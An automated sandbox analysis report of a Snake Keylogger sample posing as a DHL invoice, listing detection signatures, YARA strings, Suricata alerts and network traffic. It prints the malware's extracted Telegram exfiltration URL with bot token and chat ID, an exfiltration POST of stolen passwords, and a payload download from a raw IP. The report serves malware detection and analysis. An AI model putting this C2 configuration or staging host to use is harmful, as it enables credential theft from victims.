Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invoice DHL - AWB 2024 E4001 - 0000731.exe

Overview

General Information

Sample name:Invoice DHL - AWB 2024 E4001 - 0000731.exe
Analysis ID:1578744
MD5:1147fdf9a4f5f4dcdbdd6c080c88e083
SHA1:753e81bcdb1750a4cc0d34093fe2cd5f5512d77a
SHA256:4ec5b3be5d6a5039ec5c725a8da4290f6faf51e744c4b6441c9e625dbe7cc88e
Tags:exeuser-julianmckein
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sample has a suspicious name (potential lure to open the executable)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • Invoice DHL - AWB 2024 E4001 - 0000731.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe" MD5: 1147FDF9A4F5F4DCDBDD6C080C88E083)
    • InstallUtil.exe (PID: 1432 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage?chat_id=6287380231", "Token": "8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8", "Chat_id": "6287380231", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0x142b9:$a1: get_encryptedPassword
    • 0x1459d:$a2: get_encryptedUsername
    • 0x140c5:$a3: get_timePasswordChanged
    • 0x141c0:$a4: get_passwordField
    • 0x142cf:$a5: set_encryptedPassword
    • 0x1590f:$a7: get_logins
    • 0x15872:$a10: KeyLoggerEventArgs
    • 0x154dd:$a11: KeyLoggerEventArgsEventHandler
    00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
    • 0x1935c:$x1: $%SMTPDV$
    • 0x17c3c:$x2: $#TheHashHere%&
    • 0x19304:$x3: %FTPDV$
    • 0x17bdc:$x4: $%TelegramDv$
    • 0x154dd:$x5: KeyLoggerEventArgs
    • 0x15872:$x5: KeyLoggerEventArgs
    • 0x19328:$m2: Clipboard Logs ID
    • 0x19566:$m2: Screenshot Logs ID
    • 0x19676:$m2: keystroke Logs ID
    • 0x19950:$m3: SnakePW
    • 0x1953e:$m4: \SnakeKeylogger\
    00000000.00000002.2050649719.0000000005E70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000004.00000002.2940130567.00000000025D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Click to see the 16 entries
        SourceRuleDescriptionAuthorStrings
        0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.5e70000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          4.2.InstallUtil.exe.420000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            4.2.InstallUtil.exe.420000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              4.2.InstallUtil.exe.420000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x144b9:$a1: get_encryptedPassword
              • 0x1479d:$a2: get_encryptedUsername
              • 0x142c5:$a3: get_timePasswordChanged
              • 0x143c0:$a4: get_passwordField
              • 0x144cf:$a5: set_encryptedPassword
              • 0x15b0f:$a7: get_logins
              • 0x15a72:$a10: KeyLoggerEventArgs
              • 0x156dd:$a11: KeyLoggerEventArgsEventHandler
              4.2.InstallUtil.exe.420000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1bf4a:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x1b17c:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x1b5af:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1c5ee:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 19 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T10:22:42.787363+010028033053Unknown Traffic192.168.2.449739104.21.67.152443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T10:22:38.842172+010028032742Potentially Bad Traffic192.168.2.449737132.226.247.7380TCP
              2024-12-20T10:22:41.170332+010028032742Potentially Bad Traffic192.168.2.449737132.226.247.7380TCP
              2024-12-20T10:22:44.264063+010028032742Potentially Bad Traffic192.168.2.449740132.226.247.7380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T10:23:09.381203+010028530061A Network Trojan was detected192.168.2.449769149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeAvira: detected
              Source: 00000004.00000002.2938468893.0000000000422000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage?chat_id=6287380231", "Token": "8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8", "Chat_id": "6287380231", "Version": "5.1"}
              Source: InstallUtil.exe.1432.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendMessage"}
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeVirustotal: Detection: 26%Perma Link
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeReversingLabs: Detection: 26%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49738 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49769 version: TLS 1.2
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.000000000341F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2050754854.0000000005F10000.00000004.08000000.00040000.00000000.sdmp, Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2048398887.0000000003388000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 4x nop then jmp 05F7E123h0_2_05F7DDA8
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 4x nop then jmp 05F7E123h0_2_05F7DD9B
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 4x nop then jmp 05F7816Bh0_2_05F77F38
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 4x nop then jmp 05F7816Bh0_2_05F77F28
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeCode function: 4x nop then jmp 05F7E123h0_2_05F7E0CB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 009CF206h4_2_009CF017
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 009CFB90h4_2_009CF017
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_009CE538
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_009CEB6B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_009CED4C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D91471h4_2_05D911C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D902F1h4_2_05D90040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9C8F1h4_2_05D9C648
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D91A38h4_2_05D91620
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9C499h4_2_05D9C1F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9C041h4_2_05D9BD98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9F461h4_2_05D9F1B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9BBE9h4_2_05D9B940
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D91011h4_2_05D90D60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9F009h4_2_05D9ED60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D91A38h4_2_05D91966
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9EBB1h4_2_05D9E908
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D90BB1h4_2_05D90900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9B791h4_2_05D9B4E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9E759h4_2_05D9E4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D90751h4_2_05D904A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9E301h4_2_05D9E058
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9DEA9h4_2_05D9DC00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9DA51h4_2_05D9D7A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9D5F9h4_2_05D9D350
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9D1A1h4_2_05D9CEF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9CD49h4_2_05D9CAA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9FD11h4_2_05D9FA68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D9F8B9h4_2_05D9F610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05D91A38h4_2_05D91610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC7C4Dh4_2_05DC7910
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC6049h4_2_05DC5DA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC5BF1h4_2_05DC5948
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC0FF1h4_2_05DC0D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC0B99h4_2_05DC08F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC5799h4_2_05DC54F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC5341h4_2_05DC5098
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC0741h4_2_05DC0498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC7761h4_2_05DC74B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC4EE9h4_2_05DC4C40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC02E9h4_2_05DC0040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC7309h4_2_05DC7060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC6EB1h4_2_05DC6C08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_05DCF032
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC4A91h4_2_05DC47E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC6A59h4_2_05DC67B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC4611h4_2_05DC4368
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05DC64CBh4_2_05DC6220

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49769 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: Yara matchFile source: 4.2.InstallUtil.exe.420000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.346dfd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Invoice DHL - AWB 2024 E4001 - 0000731.exe.341f7b0.2.raw.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21e85383b951Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /STATO/Vskhdvzxu.mp3 HTTP/1.1Host: 160.22.121.182Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
              Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.67.152:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49738 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: unknownTCP traffic detected without corresponding DNS query: 160.22.121.182
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /STATO/Vskhdvzxu.mp3 HTTP/1.1Host: 160.22.121.182Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
